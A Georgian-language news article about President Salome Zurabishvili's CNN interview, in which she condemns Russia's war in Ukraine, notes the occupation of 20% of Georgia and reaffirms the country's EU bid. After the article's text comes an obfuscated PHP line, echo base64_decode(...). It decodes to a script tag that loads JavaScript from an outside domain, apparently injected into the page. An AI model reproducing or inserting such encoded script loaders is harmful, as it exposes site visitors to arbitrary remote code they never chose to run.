celsiusi
ავერსი შნაიდერი
საქართველოს პრეზიდენტმა სალომე ზურაბიშვილმა CNN-ის პირდაპირ ეთერში განაცხადა, რომ პუტინი მასობრივი განადგურების ომს აწარმოებს.
 
ზურაბიშვილმა კიდევ ერთხელ აღნიშნა, რომ რუსეთს საქართველოს 20% აქვს ოკუპირებული და რუსული საფრთხეები ჯერ კიდევ არსებობს, მაგრამ ეს არ ცვლის საქართველოს ევროატლანტიკურ კურსს. ამერიკულ მედიასთან მან საქართველოს ევროკავშირში წევრობაზე განაცხადისა და ამერიკის შეერთებული შტატების მხარდაჭერაზეც ისაუბრა.
 
"როგორც ჩანს, რუსეთის მიზანი მხოლოდ რამდენიმე რეგიონის ანექსია აღარაა. ახლა როგორც ჩანს, ის მთელ ქვეყანას ანგრევს. ეს მასობრივი განადგურების ომია. ახლა ვლადიმერ პუტინი ამბობს, რომ ყველაფერი გეგმის მიხედვით მიდის, თუმცა ამაში დარწმუნებული არ ვარ. პუტინი ელოდა, რომ იმ გეგმის მიღწევა, რაც მას ჰქონდა, გაცილებით იოლი იქნებოდა. ის ფიქრობდა, რომ ამ მთავრობისგან სასურველს მალე მიიღებდა. ის არ ელოდა უკრაინისგან ამხელა წინააღმდეგობას. ის, თუ როგორ ექცევა პუტინი ამ რეგიონებს, ქალაქებს, მოქალაქეებს და ბავშვებსაც კი, აჩვენებს, რომ მან თავად შექმნა რუსეთის ახალი მტრები. რუსეთის ყურადღება ერთხელ უკვე იყო მიპყრობილი საქართველოსკენ, ისტორიულად ასეთი რამ ძალიან ხშირად მომხდარა. ამიტომ ჩვენ ყოველთვის ყურადღებიანები ვართ და შეშფოთებულები, რადგან გვაქვს საოკუპაციო ზოლი, საქართველოს 20% ოკუპირებულია. ამ ორ რეგიონში რუსეთს ორი დიდი სამხედრო ბაზა აქვს, რომელსაც შეუძლია ნებისმიერ მომენტში დაიძრნენ. მაგრამ ეს არ ნიშნავს, რომ საქართველო შეცვლის ევროატლანტიკური ინტეგრაციის კურსს. ჩვენ შევიტანეთ განაცხადი ევროკავშირის წევრობაზე, ისევე როგორც მოლდოვამ და მანამდე უკრაინამ. ეს ნიშნავს, რომ ევროკავშირთან ასოცირების ხელშეკრულების ხელმომწერი ქვეყნების ტრიო ერთი და იმავე გზას მიჰყვებიან. ასე რომ, პუტინს შეუძლია ქვეყნების დაშინება, თუმცა ვერ შეაცვლევინებს ორიენტაციას, ვერ შეცვლის ერის გაბედულებასა და გადაწყვეტილებას, შეინარჩუნონ დამოუკიდებლობა და სუვერენიტეტი. ეს კი იმას ნიშნავს, რომ ირჩევ მოკავშირეებს და ორგანიზაციებს, სადაც გინდა ინტეგრაცია,"-განაცხადა ზურაბიშვილმა ინტერვიუში.
 
 
872
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");